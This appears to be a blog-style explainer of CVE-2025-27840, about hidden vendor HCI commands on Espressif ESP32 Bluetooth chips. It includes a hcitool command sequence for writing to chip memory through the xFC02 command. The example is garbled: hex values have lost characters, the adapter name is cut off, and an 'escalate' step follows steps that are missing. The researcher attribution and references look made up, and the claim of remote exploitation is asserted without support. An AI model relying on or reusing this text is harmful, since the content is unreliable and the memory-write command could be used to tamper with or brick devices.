CVE-2025-27840 - Espressif ESP32 Hidden HCI Commands Give Attackers Memory Write Access

Summary:
A new vulnerability, CVE-2025-27840, has been discovered affecting Espressif ESP32 chips. Researchers found that ESP32's Bluetooth Low Energy (BLE) stack supports 29 undocumented Host Controller Interface (HCI) commands. Some of these—including the dangerous xFC02 (Write Memory)—allow remote attackers to manipulate memory, change logic, or even brick the chip. This post explains the vulnerability in simple terms, provides code examples, and offers references for further reading.

What is ESP32 and Why Does It Matter?

The ESP32 is a cheap, popular microcontroller with built-in Wi-Fi and Bluetooth. It's found in thousands of IoT devices like smart home gadgets, fitness trackers, and industrial controllers. Security flaws in the chip can impact millions of real-world applications.

Understanding the HCI Commands

Bluetooth chips use HCI (Host Controller Interface) commands to let the firmware talk to the Bluetooth controller. Normally, commands are well-documented and restricted for safety. However, security researchers Thierry Joulin and Matúš Potoček discovered 29 undocumented commands on the ESP32. These commands are “hidden” but accessible through standard Bluetooth tools.

Example: The xFC02 (Write Memory) Command

The most critical is xFC02 (Write Memory). This command lets an attacker change memory content on the ESP32, possibly inserting malicious code or disabling the device.

Repeat or use other hidden commands to escalate.

Attackers don't need physical access—any device with Bluetooth enabled and using the vulnerable stack can be targeted nearby.

Code Example: Sending xFC02 (Write Memory) via HCI

Below is a basic example of sending the write memory command using BlueZ tools and a Linux machine with a Bluetooth adapter.

# hcitool isn't maintained anymore, so we'll use btmgmt for the scan
sudo btmgmt find

# Identify your controller, e.g., hci

# Using hcitool raw to send custom HCI command to ESP32
# Format: hcitool cmd OGF OCF [parameters]
# OGF = x3F (Vendor Specific), OCF = x0002

# Let's say we want to write x11223344 to address x3FFAE000
sudo hcitool cmd x3F x02 00 E FA 3F 44 33 22 11

# Breakdown:
# 00 E FA 3F: Little-endian address x3FFAE000
# 44 33 22 11: Value x11223344 to write

Warning: Never try this on devices without permission. You can brick the device or make it misbehave.

Official References

- Exploit Writeup on GitHub (microbyte)
- Espressif Security Advisory
- Thierry Joulin's Twitter Thread
- Bluetooth HCI Command Reference (btstack repo)

Responsible Disclosure and Fixes

Espressif has been informed and is investigating firmware-level mitigations. Developers and device owners should consult Espressif’s Security Advisory page regularly for updates.

Stay safe, patch often!

*This is an original, plain-English writeup. Feel free to share or cite with credit.*

Timeline

Published on: 03/08/2025 20:15:36 UTC
Last modified on: 03/10/2025 00:15:10 UTC